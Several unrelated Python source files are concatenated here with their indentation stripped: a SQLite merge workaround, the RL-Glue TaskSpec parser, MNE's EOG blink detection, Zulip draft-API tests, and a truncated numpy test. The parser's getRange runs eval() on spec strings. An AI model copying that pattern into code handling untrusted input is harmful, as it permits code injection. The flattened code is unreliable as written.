errors = []
for try_count in range(2):
try:
if try_count > 0:
tmp_dbs = [os.path.join(args.tempdir, "%s.db" % uuid.uuid4())
for _ in args.chunkdbs]
for chunk_db, tmp_db in zip(args.chunkdbs, tmp_dbs):
shutil.copyfile(chunk_db[0], tmp_db)
chunk_db[0] = tmp_db
output_db = args.db
args.db = os.path.join(args.tempdir, "%s.db" % uuid.uuid4())
merge_db_chunks(args)
if try_count > 0:
shutil.move(args.db, output_db)
for tmp_db in tmp_dbs:
os.remove(tmp_db)
break
except sqlite3.OperationalError, e:
errors.append(str(e))
sys.stderr.write("sqlite3.OperationalError: %s\n" % e)
else:
raise Exception("Attempted workaround for SQLite locking issue on NFS "
"drives has failed. One possible reason is that the temp directory "
"%s is also on an NFS drive. Error messages from SQLite: %s"
% (args.tempdir, " ".join(errors)))
|
|
#
# Copyright (C) 2009, Jose Antonio Martin H.
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# $Revision: 465 $
# $Date: 2009-01-28 19:55:32 -0700 (Wed, 28 Jan 2009) $
# $Author: xjamartinh $
# $HeadURL: http://rl-glue-ext.googlecode.com/svn/trunk/projects/codecs/Python/src/rlglue/utils/TaskSpecVRLGLUE3.py $
"""
Brian Tanner: The license above is what matters most. I think you can all
take the comments below as non-binding suggestions ;)
This file was written by Jose Antonio Martin H. for the RL-Glue Extensions project.
you are allowed to use it (and see it) fully but subject to the next conditions
1. to not cause damage to any person
2. to not use it to earn money except when you give me the 50%
3. to use it to produce a state of the art RL agent, if not, think a lot and then come back to write a super agent.
This code is a 'parser' for the RL-Glue 3.0 TaskSpec.
It does not make any duplication of information, that is, what you get is always a view of the original string.
This is not the classic state-machine or automata approach to parsing languages so in particular you will se that
the parser is robust to a big set of taskpec string malformations still getting the right information. blablabla
Last modifed 22-1-2009 by Jose Antonio Martin H.
Added enforced parsing error catching.
"""
import sys
try:
import psyco
psyco.full()
except ImportError:
pass
class TaskSpecParser:
"""
RL-Glue TaskSpec Sparser V3
"""
# BEGIN: change made by: Akshay Narayan (06-01-2015:1200)
#w = ["VERSION","PROBLEMTYPE","DISCOUNTFACTOR", "OBSERVATIONS","ACTIONS","REWARDS","EXTRA"]
# w[0] = VERSION ... w[7] = NUMOFOBJECTIVES
w = ["VERSION", "PROBLEMTYPE", "DISCOUNTFACTOR", "OBSERVATIONS", "ACTIONS", "REWARDS", "NUMOFOBJECTIVES", "EXTRA"]
# END: change made by: Akshay Narayan (06-01-2015:1200)
v = ["INTS","DOUBLES","CHARCOUNT"]
expected_version = "RL-Glue-3.0"
valid = True
last_error = ""
def __init__(self,ts):
self.ts = ts
if self.expected_version != self.getVersion():
print ("Warning: TaskSpec Version is not "+self.expected_version+" but "+self.getVersion())
self.valid = False
while self.ts.find(" ")!=-1:
self.ts = self.ts.replace(" "," ")
def getVersion(self):
a = len(self.w[0])+1
return self.ts[a:self.ts.find(" ",a)]
def Validate(self):
if not self.valid:
print ("Warning: TaskSpec String is invalid: "+self.last_error)
return False
return True
def getValue(self,i,ts,w):
try:
a = ts.index(w[i]) + len(w[i]) + 1
except: #ValueError:
#raise AttributeError("Malformed TaskSpec String: could not find the "+w[i]+" keyword")
self.last_error = "could not find the "+w[i]+" keyword"
print ("Warning: Malformed TaskSpec String: " +self.last_error)
self.valid = False
return ""
b=None
if (i+1)<len(w):
try:
b = ts.index(w[i+1])-1
except: #ValueError:
#raise AttributeError("Malformed TaskSpec String: could not find the "+w[i+1]+" keyword")
self.last_error = "could not find the "+w[i+1]+" keyword"
print ("Warning: Malformed TaskSpec String: " +self.last_error)
self.valid = False
return ""
return ts[a:b].strip()
def getProblemType(self):
if not self.Validate():
return ""
return self.getValue(1,self.ts,self.w)
def getDiscountFactor(self):
if not self.Validate():
return ""
return float(self.getValue(2,self.ts,self.w))
def CompleteVars(self,str_in):
if not self.Validate():
return ""
""" forces the vars to have ints doubles and charcount
"""
if self.v[0] not in str_in:
str_in = self.v[0]+" (0 0 0) " + str_in
if self.v[2] not in str_in:
str_in= str_in.rstrip()+" "+self.v[2]+" 0 "
if self.v[1] not in str_in:
i = str_in.find(self.v[2])
str_in= str_in[0:i]+self.v[1]+" (0 0 0) "+str_in[i:]
return str_in
def getObservations(self):
if not self.Validate():
return ""
str_o = self.getValue(3,self.ts,self.w)
return self.CompleteVars(str_o)
def getActions(self):
if not self.Validate():
return ""
str_a = self.getValue(4,self.ts,self.w)
return self.CompleteVars(str_a)
def getReward(self):
if not self.Validate():
return ""
return self.getValue(5,self.ts,self.w)
# BEGIN: change made by: Akshay Narayan (06-01-2015:1209)
def getNumOfObjectives(self):
if not self.Validate():
return ""
return int(self.getValue(6, self.ts, self.w))
# END: change made by: Akshay Narayan (06-01-2015:1209)
def getExtra(self):
if not self.Validate():
return ""
# BEGIN: change made by: Akshay Narayan (06-01-2015:1237)
#return self.getValue(6,self.ts,self.w)
return self.getValue(7,self.ts,self.w)
# END: change made by: Akshay Narayan (06-01-2015:1237)
def isSpecial(self,maxOrMin):
if type(maxOrMin)!=type(""):
return False
if maxOrMin=="UNSPEC" or maxOrMin=="NEGINF" or maxOrMin=="POSINF":
return True;
else:
return False;
def getRange(self,str_input):
if not self.Validate():
return ""
try:
str_input = str_input.replace("UNSPEC","'UNSPEC'")
str_input = str_input.replace("NEGINF","'NEGINF'")
str_input = str_input.replace("POSINF","'POSINF'")
str_input = str_input.replace(" ",",")
r = eval(str_input)
if len(r)==2:
return [list(r)]
out = r[0]*([[r[1],r[2]]])
return out
except:
self.last_error = "error ocurred while parsing a Range in "+str_input
print ("Warning: Malformed TaskSpec String: " +self.last_error)
print (sys.exc_info())
self.valid = False
return ""
def getRewardRange(self):
if not self.Validate():
return ""
str_reward = self.getReward()
return self.getRange(str_reward)
def getVarInfoRange(self,i,ts,w):
self.Validate()
a = ts.index(w[i])
b = ts.index(w[i+1])+1
return ts[a:b]
def GetVarValue(self,i,str_o):
if not self.Validate():
return ""
str_r = self.getValue(i,str_o,self.v)
str_r = str_r.replace(") (",")#(")
# Ok I can parse it but this (there is no space or there is an extra space in ranges)
# should be checked since this means that the taskspec is malformed
str_r = str_r.replace("( ","(")
str_r = str_r.replace(" )",")")
str_r = str_r.replace(")(",")#(")
parts = str_r.split("#")
obs=[]
for p in parts:
obs.extend(self.getRange(p))
return obs
def getIntObservations(self):
if not self.Validate():
return ""
return self.GetVarValue(0,self.getObservations())
def getDoubleObservations(self):
if not self.Validate():
return ""
return self.GetVarValue(1,self.getObservations())
def getCharCountObservations(self):
if not self.Validate():
return ""
str_o = self.getObservations()
return int(self.getValue(2,str_o,self.v))
def getIntActions(self):
if not self.Validate():
return ""
return self.GetVarValue(0,self.getActions())
def getDoubleActions(self):
if not self.Validate():
return ""
return self.GetVarValue(1,self.getActions())
def getCharCountActions(self):
if not self.Validate():
return ""
str_a = self.getActions()
return int(self.getValue(2,str_a,self.v))
def test():
# you can cut the taskspec by the main words with new line
# BEGIN: change made by: Akshay Narayan (06-01-2015:1230)
#ts ="""VERSION RL-Glue-3.0 PROBLEMTYPE episodic DISCOUNTFACTOR .7 OBSERVATIONS INTS (NEGINF 1) ( 2 -5 POSINF ) DOUBLES (2 -1.2 0.5 )(-.07 .07) (UNSPEC 3.3) (0 100.5) CHARCOUNT 32
# ACTIONS INTS (5 0 4) DOUBLES (-.5 2) (2 7.8 9) (NEGINF UNSPEC) REWARDS (-5.0 5.0) EXTRA some other stuff goes here"""
ts ="""VERSION RL-Glue-3.0 PROBLEMTYPE episodic DISCOUNTFACTOR .7 OBSERVATIONS INTS (NEGINF 1) ( 2 -5 POSINF ) DOUBLES (2 -1.2 0.5 )(-.07 .07) (UNSPEC 3.3) (0 100.5) CHARCOUNT 32
ACTIONS INTS (5 0 4) DOUBLES (-.5 2) (2 7.8 9) (NEGINF UNSPEC) REWARDS (-5.0 5.0) NUMOFOBJECTIVES 3 EXTRA some other stuff goes here"""
# END: change made by: Akshay Narayan (06-01-2015:1230)
print (ts)
print ()
print ()
TaskSpec = TaskSpecParser(ts)
if TaskSpec.valid:
print ("=======================================================================================================")
print ("Version: ["+TaskSpec.getVersion()+"]")
print ("ProblemType: ["+TaskSpec.getProblemType()+"]")
print ("DiscountFactor: ["+str(TaskSpec.getDiscountFactor())+"]")
print ("=======================================================================================================")
# BEGIN: change made by: Akshay Narayan (06-01-2015:1228)
print ("Number of objectives: ["+str(TaskSpec.getNumOfObjectives())+"]")
# END: change made by: Akshay Narayan (06-01-2015:1228)
print ("=======================================================================================================")
print ("\t \t \t \t Observations")
print ("=======================================================================================================")
print ("Observations: ["+TaskSpec.getObservations()+"]")
print ("Integers:",TaskSpec.getIntObservations())
print ("Doubles: ",TaskSpec.getDoubleObservations())
print ("Chars: ",TaskSpec.getCharCountObservations())
print ("=======================================================================================================")
print ("\t \t \t \t Actions")
print ("======================================================================================================")
print ("Actions: ["+TaskSpec.getActions()+"]")
print ("Integers:",TaskSpec.getIntActions())
print ("Doubles: ",TaskSpec.getDoubleActions())
print ("Chars: ",TaskSpec.getCharCountActions())
print ("=======================================================================================================")
print ("Reward :["+TaskSpec.getReward()+"]")
print ("Reward Range:",TaskSpec.getRewardRange())
print ("Extra: ["+TaskSpec.getExtra()+"]")
print ("remember that by using len() you get the cardinality of lists!")
print ("Thus:")
print ("len(",TaskSpec.getDoubleObservations(),") ==> ",len(TaskSpec.getDoubleObservations())," Double Observations")
print (TaskSpec.isSpecial("NEGINF"));
if __name__=="__main__":
test()
|
|
# Authors: Alexandre Gramfort <[email protected]>
# Denis Engemann <[email protected]>
# Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import numpy as np
from .peak_finder import peak_finder
from .. import pick_types, pick_channels
from ..utils import logger, verbose
from ..filter import band_pass_filter
from ..epochs import Epochs
from ..externals.six import string_types
@verbose
def find_eog_events(raw, event_id=998, l_freq=1, h_freq=10,
filter_length='10s', ch_name=None, tstart=0,
verbose=None):
"""Locate EOG artifacts
Parameters
----------
raw : instance of Raw
The raw data.
event_id : int
The index to assign to found events.
l_freq : float
Low cut-off frequency in Hz.
h_freq : float
High cut-off frequency in Hz.
filter_length : str | int | None
Number of taps to use for filtering.
ch_name: str | None
If not None, use specified channel(s) for EOG
tstart : float
Start detection after tstart seconds.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
eog_events : array
Events.
"""
# Getting EOG Channel
eog_inds = _get_eog_channel_index(ch_name, raw)
logger.info('EOG channel index for this subject is: %s' % eog_inds)
eog, _ = raw[eog_inds, :]
eog_events = _find_eog_events(eog, event_id=event_id, l_freq=l_freq,
h_freq=h_freq,
sampling_rate=raw.info['sfreq'],
first_samp=raw.first_samp,
filter_length=filter_length,
tstart=tstart)
return eog_events
def _find_eog_events(eog, event_id, l_freq, h_freq, sampling_rate, first_samp,
filter_length='10s', tstart=0.):
"""Helper function"""
logger.info('Filtering the data to remove DC offset to help '
'distinguish blinks from saccades')
# filtering to remove dc offset so that we know which is blink and saccades
fmax = np.minimum(45, sampling_rate / 2.0 - 0.75) # protect Nyquist
filteog = np.array([band_pass_filter(
x, sampling_rate, 2, fmax, filter_length=filter_length,
l_trans_bandwidth=0.5, h_trans_bandwidth=0.5, phase='zero-double',
fir_window='hann') for x in eog])
temp = np.sqrt(np.sum(filteog ** 2, axis=1))
indexmax = np.argmax(temp)
# easier to detect peaks with filtering.
filteog = band_pass_filter(
eog[indexmax], sampling_rate, l_freq, h_freq,
filter_length=filter_length, l_trans_bandwidth=0.5,
h_trans_bandwidth=0.5, phase='zero-double', fir_window='hann')
# detecting eog blinks and generating event file
logger.info('Now detecting blinks and generating corresponding events')
temp = filteog - np.mean(filteog)
n_samples_start = int(sampling_rate * tstart)
if np.abs(np.max(temp)) > np.abs(np.min(temp)):
eog_events, _ = peak_finder(filteog[n_samples_start:], extrema=1)
else:
eog_events, _ = peak_finder(filteog[n_samples_start:], extrema=-1)
eog_events += n_samples_start
n_events = len(eog_events)
logger.info("Number of EOG events detected : %d" % n_events)
eog_events = np.array([eog_events + first_samp,
np.zeros(n_events, int),
event_id * np.ones(n_events, int)]).T
return eog_events
def _get_eog_channel_index(ch_name, inst):
if isinstance(ch_name, string_types):
# Check if multiple EOG Channels
if ',' in ch_name:
ch_name = ch_name.split(',')
else:
ch_name = [ch_name]
eog_inds = pick_channels(inst.ch_names, include=ch_name)
if len(eog_inds) == 0:
raise ValueError('%s not in channel list' % ch_name)
else:
logger.info('Using channel %s as EOG channel%s' % (
" and ".join(ch_name),
'' if len(eog_inds) < 2 else 's'))
elif ch_name is None:
eog_inds = pick_types(inst.info, meg=False, eeg=False, stim=False,
eog=True, ecg=False, emg=False, ref_meg=False,
exclude='bads')
if len(eog_inds) == 0:
logger.info('No EOG channels found')
logger.info('Trying with EEG 061 and EEG 062')
eog_inds = pick_channels(inst.ch_names,
include=['EEG 061', 'EEG 062'])
if len(eog_inds) != 2:
raise RuntimeError('EEG 61 or EEG 62 channel not found !!')
else:
raise ValueError('Could not find EOG channel.')
return eog_inds
@verbose
def create_eog_epochs(raw, ch_name=None, event_id=998, picks=None,
tmin=-0.5, tmax=0.5, l_freq=1, h_freq=10,
reject=None, flat=None, baseline=None,
preload=True, verbose=None):
"""Conveniently generate epochs around EOG artifact events
Parameters
----------
raw : instance of Raw
The raw data
ch_name : str
The name of the channel to use for EOG peak detection.
The argument is mandatory if the dataset contains no EOG channels.
event_id : int
The index to assign to found events
picks : array-like of int | None (default)
Indices of channels to include (if None, all channels
are used).
tmin : float
Start time before event.
tmax : float
End time after event.
l_freq : float
Low pass frequency.
h_freq : float
High pass frequency.
reject : dict | None
Rejection parameters based on peak-to-peak amplitude.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg'.
If reject is None then no rejection is done. Example::
reject = dict(grad=4000e-13, # T / m (gradiometers)
mag=4e-12, # T (magnetometers)
eeg=40e-6, # V (EEG channels)
eog=250e-6 # V (EOG channels)
)
flat : dict | None
Rejection parameters based on flatness of signal.
Valid keys are 'grad' | 'mag' | 'eeg' | 'eog' | 'ecg', and values
are floats that set the minimum acceptable peak-to-peak amplitude.
If flat is None then no rejection is done.
baseline : tuple or list of length 2, or None
The time interval to apply rescaling / baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal ot (None, None) all the time
interval is used. If None, no correction is applied.
preload : bool
Preload epochs or not.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
eog_epochs : instance of Epochs
Data epoched around EOG events.
"""
events = find_eog_events(raw, ch_name=ch_name, event_id=event_id,
l_freq=l_freq, h_freq=h_freq)
# create epochs around EOG events
eog_epochs = Epochs(raw, events=events, event_id=event_id,
tmin=tmin, tmax=tmax, proj=False, reject=reject,
flat=flat, picks=picks, baseline=baseline,
preload=preload, add_eeg_ref=False)
return eog_epochs
|
|
import time
from copy import deepcopy
from typing import Any, Dict, List, Optional
import orjson
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import Draft
class DraftCreationTests(ZulipTestCase):
def create_and_check_drafts_for_success(self, draft_dicts: List[Dict[str, Any]],
expected_draft_dicts: Optional[List[Dict[str, Any]]]=None) -> None:
hamlet = self.example_user("hamlet")
# Make sure that there are no drafts in the database before
# the test begins.
self.assertEqual(Draft.objects.count(), 0)
# Now send a POST request to the API endpoint.
payload = {"drafts": orjson.dumps(draft_dicts).decode()}
resp = self.api_post(hamlet, "/api/v1/drafts", payload)
self.assert_json_success(resp)
# Finally check to make sure that the drafts were actually created properly.
new_draft_dicts = []
for draft in Draft.objects.order_by("last_edit_time"):
draft_dict = draft.to_dict()
draft_dict.pop("id")
new_draft_dicts.append(draft_dict)
if expected_draft_dicts is None:
expected_draft_dicts = draft_dicts
self.assertEqual(new_draft_dicts, expected_draft_dicts)
def create_and_check_drafts_for_error(self, draft_dicts: List[Dict[str, Any]],
expected_message: str) -> None:
hamlet = self.example_user("hamlet")
# Make sure that there are no drafts in the database before
# the test begins.
self.assertEqual(Draft.objects.count(), 0)
# Now send a POST request to the API endpoint.
payload = {"drafts": orjson.dumps(draft_dicts).decode()}
resp = self.api_post(hamlet, "/api/v1/drafts", payload)
self.assert_json_error(resp, expected_message)
# Make sure that there are no drafts in the database at the
# end of the test. Drafts should never be created in error
# conditions.
self.assertEqual(Draft.objects.count(), 0)
def test_create_one_stream_draft_properly(self) -> None:
hamlet = self.example_user("hamlet")
visible_stream_name = self.get_streams(hamlet)[0]
visible_stream_id = self.get_stream_id(visible_stream_name)
draft_dicts = [{
"type": "stream",
"to": [visible_stream_id],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_success(draft_dicts)
def test_create_one_personal_message_draft_properly(self) -> None:
zoe = self.example_user("ZOE")
draft_dicts = [{
"type": "private",
"to": [zoe.id],
"topic": "This topic should be ignored.",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
expected_draft_dicts = [{
"type": "private",
"to": [zoe.id],
"topic": "", # For private messages the topic should be ignored.
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_success(draft_dicts, expected_draft_dicts)
def test_create_one_group_personal_message_draft_properly(self) -> None:
zoe = self.example_user("ZOE")
othello = self.example_user("othello")
draft_dicts = [{
"type": "private",
"to": [zoe.id, othello.id],
"topic": "This topic should be ignored.",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
expected_draft_dicts = [{
"type": "private",
"to": [zoe.id, othello.id],
"topic": "", # For private messages the topic should be ignored.
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_success(draft_dicts, expected_draft_dicts)
def test_create_batch_of_drafts_properly(self) -> None:
hamlet = self.example_user("hamlet")
visible_stream_name = self.get_streams(hamlet)[0]
visible_stream_id = self.get_stream_id(visible_stream_name)
zoe = self.example_user("ZOE")
othello = self.example_user("othello")
draft_dicts = [
{
"type": "stream",
"to": [visible_stream_id],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
}, # Stream message draft
{
"type": "private",
"to": [zoe.id],
"topic": "",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479020,
}, # Private message draft
{
"type": "private",
"to": [zoe.id, othello.id],
"topic": "",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479021,
}, # Private group message draft
]
self.create_and_check_drafts_for_success(draft_dicts)
def test_missing_timestamps(self) -> None:
""" If a timestamp is not provided for a draft dict then it should be automatically
filled in. """
hamlet = self.example_user("hamlet")
visible_stream_name = self.get_streams(hamlet)[0]
visible_stream_id = self.get_stream_id(visible_stream_name)
draft_dicts = [{
"type": "stream",
"to": [visible_stream_id],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
}]
self.assertEqual(Draft.objects.count(), 0)
current_time = int(time.time())
payload = {"drafts": orjson.dumps(draft_dicts).decode()}
resp = self.api_post(hamlet, "/api/v1/drafts", payload)
self.assert_json_success(resp)
new_drafts = Draft.objects.all()
self.assertEqual(Draft.objects.count(), 1)
new_draft = new_drafts[0].to_dict()
self.assertTrue(isinstance(new_draft["timestamp"], int))
# Since it would be too tricky to get the same times, perform
# a relative check.
self.assertTrue(new_draft["timestamp"] >= current_time)
def test_invalid_timestamp(self) -> None:
draft_dicts = [{
"type": "stream",
"to": [],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": -10.10,
}]
self.create_and_check_drafts_for_error(
draft_dicts,
"Timestamp must not be negative."
)
def test_create_non_stream_draft_with_no_recipient(self) -> None:
""" When "to" is an empty list, the type should become "" as well. """
draft_dicts = [
{
"type": "private",
"to": [],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
},
{
"type": "",
"to": [],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
},
]
expected_draft_dicts = [
{
"type": "",
"to": [],
"topic": "",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
},
{
"type": "",
"to": [],
"topic": "",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
},
]
self.create_and_check_drafts_for_success(draft_dicts, expected_draft_dicts)
def test_create_stream_draft_with_no_recipient(self) -> None:
draft_dicts = [{
"type": "stream",
"to": [],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 15954790199,
}]
self.create_and_check_drafts_for_error(
draft_dicts,
"Must specify exactly 1 stream ID for stream messages"
)
def test_create_stream_draft_for_inaccessible_stream(self) -> None:
# When the user does not have permission to access the stream:
stream = self.make_stream("Secret Society", invite_only=True)
draft_dicts = [{
"type": "stream",
"to": [stream.id], # This can't be accessed by hamlet.
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_error(draft_dicts, "Invalid stream id")
# When the stream itself does not exist:
draft_dicts = [{
"type": "stream",
"to": [99999999999999], # Hopefully, this doesn't exist.
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_error(draft_dicts, "Invalid stream id")
def test_create_personal_message_draft_for_non_existing_user(self) -> None:
draft_dicts = [{
"type": "private",
"to": [99999999999999], # Hopefully, this doesn't exist either.
"topic": "This topic should be ignored.",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_error(draft_dicts, "Invalid user ID 99999999999999")
def test_create_draft_with_null_bytes(self) -> None:
draft_dicts = [{
"type": "",
"to": [],
"topic": "sync drafts.",
"content": "Some regular \x00 content here",
"timestamp": 15954790199,
}]
self.create_and_check_drafts_for_error(
draft_dicts,
"Message must not contain null bytes"
)
draft_dicts = [{
"type": "stream",
"to": [10],
"topic": "thinking about \x00",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 15954790199,
}]
self.create_and_check_drafts_for_error(
draft_dicts,
"Topic must not contain null bytes"
)
class DraftEditTests(ZulipTestCase):
def test_edit_draft_successfully(self) -> None:
hamlet = self.example_user("hamlet")
visible_streams = self.get_streams(hamlet)
stream_a = self.get_stream_id(visible_streams[0])
stream_b = self.get_stream_id(visible_streams[1])
# Make sure that there are no drafts at the start of this test.
self.assertEqual(Draft.objects.count(), 0)
# Create a draft.
draft_dict = {
"type": "stream",
"to": [stream_a],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_post(hamlet, "/api/v1/drafts", {"drafts": orjson.dumps([draft_dict]).decode()})
self.assert_json_success(resp)
new_draft_id = orjson.loads(resp.content)["ids"][0]
# Change the draft data.
draft_dict["content"] = "The API needs to be structured yet simple to use."
draft_dict["to"] = [stream_b]
draft_dict["topic"] = "designing drafts"
draft_dict["timestamp"] = 1595505800
# Update this change in the backend.
resp = self.api_patch(hamlet, f"/api/v1/drafts/{new_draft_id}",
{"draft": orjson.dumps(draft_dict).decode()})
self.assert_json_success(resp)
# Now make sure that the change was made successfully.
new_draft = Draft.objects.get(id=new_draft_id, user_profile=hamlet)
new_draft_dict = new_draft.to_dict()
new_draft_dict.pop("id")
self.assertEqual(new_draft_dict, draft_dict)
def test_edit_non_existant_draft(self) -> None:
hamlet = self.example_user("hamlet")
# Make sure that no draft exists in the first place.
self.assertEqual(Draft.objects.count(), 0)
# Try to update a draft that doesn't exist.
draft_dict = {
"type": "stream",
"to": [10],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_patch(hamlet, "/api/v1/drafts/999999999",
{"draft": orjson.dumps(draft_dict).decode()})
self.assert_json_error(resp, "Draft does not exist", status_code=404)
# Now make sure that no changes were made.
self.assertEqual(Draft.objects.count(), 0)
def test_edit_unowned_draft(self) -> None:
hamlet = self.example_user("hamlet")
visible_streams = self.get_streams(hamlet)
stream_id = self.get_stream_id(visible_streams[0])
# Make sure that there are no drafts at the start of this test.
self.assertEqual(Draft.objects.count(), 0)
# Create a draft.
draft_dict = {
"type": "stream",
"to": [stream_id],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_post(hamlet, "/api/v1/drafts", {"drafts": orjson.dumps([draft_dict]).decode()})
self.assert_json_success(resp)
new_draft_id = orjson.loads(resp.content)["ids"][0]
# Change the draft data.
modified_draft_dict = deepcopy(draft_dict)
modified_draft_dict["content"] = "???"
# Update this change in the backend as a different user.
zoe = self.example_user("ZOE")
resp = self.api_patch(zoe, f"/api/v1/drafts/{new_draft_id}",
{"draft": orjson.dumps(draft_dict).decode()})
self.assert_json_error(resp, "Draft does not exist", status_code=404)
# Now make sure that no changes were made.
existing_draft = Draft.objects.get(id=new_draft_id, user_profile=hamlet)
existing_draft_dict = existing_draft.to_dict()
existing_draft_dict.pop("id")
self.assertEqual(existing_draft_dict, draft_dict)
class DraftDeleteTests(ZulipTestCase):
def test_delete_draft_successfully(self) -> None:
hamlet = self.example_user("hamlet")
visible_streams = self.get_streams(hamlet)
stream_id = self.get_stream_id(visible_streams[0])
# Make sure that there are no drafts at the start of this test.
self.assertEqual(Draft.objects.count(), 0)
# Create a draft.
draft_dict = {
"type": "stream",
"to": [stream_id],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_post(hamlet, "/api/v1/drafts", {"drafts": orjson.dumps([draft_dict]).decode()})
self.assert_json_success(resp)
new_draft_id = orjson.loads(resp.content)["ids"][0]
# Make sure that exactly 1 draft exists now.
self.assertEqual(Draft.objects.count(), 1)
# Update this change in the backend.
resp = self.api_delete(hamlet, f"/api/v1/drafts/{new_draft_id}")
self.assert_json_success(resp)
# Now make sure that the there are no more drafts.
self.assertEqual(Draft.objects.count(), 0)
def test_delete_non_existant_draft(self) -> None:
hamlet = self.example_user("hamlet")
# Make sure that no draft exists in the first place.
self.assertEqual(Draft.objects.count(), 0)
# Try to delete a draft that doesn't exist.
resp = self.api_delete(hamlet, "/api/v1/drafts/9999999999")
self.assert_json_error(resp, "Draft does not exist", status_code=404)
# Now make sure that no drafts were made for whatever reason.
self.assertEqual(Draft.objects.count(), 0)
def test_delete_unowned_draft(self) -> None:
hamlet = self.example_user("hamlet")
visible_streams = self.get_streams(hamlet)
stream_id = self.get_stream_id(visible_streams[0])
# Make sure that there are no drafts at the start of this test.
self.assertEqual(Draft.objects.count(), 0)
# Create a draft.
draft_dict = {
"type": "stream",
"to": [stream_id],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_post(hamlet, "/api/v1/drafts", {"drafts": orjson.dumps([draft_dict]).decode()})
self.assert_json_success(resp)
new_draft_id = orjson.loads(resp.content)["ids"][0]
# Delete this draft in the backend as a different user.
zoe = self.example_user("ZOE")
resp = self.api_delete(zoe, f"/api/v1/drafts/{new_draft_id}")
self.assert_json_error(resp, "Draft does not exist", status_code=404)
# Make sure that the draft was not deleted.
self.assertEqual(Draft.objects.count(), 1)
# Now make sure that no changes were made either.
existing_draft = Draft.objects.get(id=new_draft_id, user_profile=hamlet)
existing_draft_dict = existing_draft.to_dict()
existing_draft_dict.pop("id")
self.assertEqual(existing_draft_dict, draft_dict)
class DraftFetchTest(ZulipTestCase):
def test_fetch_drafts(self) -> None:
self.assertEqual(Draft.objects.count(), 0)
hamlet = self.example_user("hamlet")
zoe = self.example_user("ZOE")
othello = self.example_user("othello")
visible_stream_id = self.get_stream_id(self.get_streams(hamlet)[0])
draft_dicts = [
{
"type": "stream",
"to": [visible_stream_id],
"topic": "thinking out loud",
"content": "What if pigs really could fly?",
"timestamp": 15954790197,
},
{
"type": "private",
"to": [zoe.id, othello.id],
"topic": "",
"content": "What if made it possible to sync drafts in Zulip?",
"timestamp": 15954790198,
},
{
"type": "private",
"to": [zoe.id],
"topic": "",
"content": "What if made it possible to sync drafts in Zulip?",
"timestamp": 15954790199,
},
]
payload = {"drafts": orjson.dumps(draft_dicts).decode()}
resp = self.api_post(hamlet, "/api/v1/drafts", payload)
self.assert_json_success(resp)
self.assertEqual(Draft.objects.count(), 3)
zoe_draft_dicts = [
{
"type": "private",
"to": [hamlet.id],
"topic": "",
"content": "Hello there!",
"timestamp": 15954790200,
},
]
payload = {"drafts": orjson.dumps(zoe_draft_dicts).decode()}
resp = self.api_post(zoe, "/api/v1/drafts", payload)
self.assert_json_success(resp)
self.assertEqual(Draft.objects.count(), 4)
# Now actually fetch the drafts. Make sure that hamlet gets only
# his drafts and exactly as he made them.
resp = self.api_get(hamlet, "/api/v1/drafts")
self.assert_json_success(resp)
data = orjson.loads(resp.content)
self.assertEqual(data["count"], 3)
first_draft_id = Draft.objects.order_by("id")[0].id
expected_draft_contents = [
{
"id": first_draft_id + i,
**draft_dicts[i]
} for i in range(0, 3)
]
self.assertEqual(data["drafts"], expected_draft_contents)
|
|
import sys
import platform
from numpy.testing import *
import numpy.core.umath as ncu
import numpy as np
class TestDivision(TestCase):
def test_division_int(self):
# int division should follow Python
x = np.array([5, 10, 90, 100, -5, -10, -90, -100, -120])
if 5 / 10 == 0.5:
assert_equal(x / 100, [0.05, 0.1, 0.9, 1,
-0.05, -0.1, -0.9, -1, -1.2])
else:
